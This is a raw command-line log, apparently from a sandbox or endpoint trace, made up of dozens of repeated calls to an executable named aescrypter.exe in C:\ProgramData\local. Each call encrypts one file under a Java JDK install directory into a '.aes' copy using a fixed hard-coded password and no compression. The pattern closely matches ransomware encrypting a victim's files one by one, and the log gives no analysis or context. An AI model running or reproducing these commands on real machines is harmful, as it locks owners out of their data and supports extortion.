"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\Xusage.txt.aes" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\Xusage.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\ffjcext.zip.aes" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\ffjcext.zip" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\jre\lib\jvm.hprof.txt.aes" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\jvm.hprof.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\jre\README.txt.aes" "C:\Program Files\Java\jdk1.7.0_80\jre\README.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt.aes" "C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME.txt.aes" "C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\artifacts.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\artifacts.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update\platform.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update\platform.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\README.TXT.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\README.TXT" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\eclipse_update_120.jpg.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\eclipse_update_120.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\eclipse_update_120.jpg.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\eclipse_update_120.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\asl-v20.txt.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\asl-v20.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\asl-v20.txt.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\asl-v20.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\artifacts.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\artifacts.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\com.jrockit.mc.console.ui.notification_contexts.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\com.jrockit.mc.console.ui.notification_contexts.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\alert_obj.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\alert_obj.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\flight_recorder.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\flight_recorder.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\toc.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\toc.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\console_view.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\console_view.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\date-span-16.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\date-span-16.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\day-of-week-16.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\day-of-week-16.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\diagnostic-command-16.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\diagnostic-command-16.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\hprof-16.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\hprof-16.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\send-email-16.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\send-email-16.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\time-span-16.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\time-span-16.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\dragHandle.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\dragHandle.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkHandle.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkHandle.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkTSFrame.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkTSFrame.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macGrey.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macGrey.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macHandle.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macHandle.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macTSFrame.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macTSFrame.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7Handle.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7Handle.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7TSFrame.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7TSFrame.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicHandle.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicHandle.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicTSFrame.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicTSFrame.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBlue.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBlue.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluHandle.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluHandle.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluTSFrame.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluTSFrame.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPHandle.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPHandle.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPOlive.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPOlive.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPTSFrame.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPTSFrame.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
